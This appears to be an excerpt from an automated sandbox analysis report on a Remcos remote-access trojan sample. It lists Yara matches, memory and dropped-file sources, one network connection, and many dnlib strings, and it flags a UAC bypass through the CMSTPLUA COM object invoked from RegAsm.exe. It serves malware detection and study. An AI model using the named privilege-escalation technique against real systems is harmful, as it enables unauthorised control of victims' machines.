                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4471996980.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4474275239.0000000002D4E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4471996980.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_004338C8
                      Source: powershell.exe, 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_bab01ced-0

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Contains functionality to bypass UAC (CMSTPLUA)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407538 _wcslen,CoGetObject,11_2_00407538
                      Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49707 version: TLS 1.2
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2279074921.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2065247057.0000000006EB6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.pdb source: powershell.exe, 00000001.00000002.2119899349.00000000050F7000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2065318838.0000000006EC7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2279074921.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.pdb source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
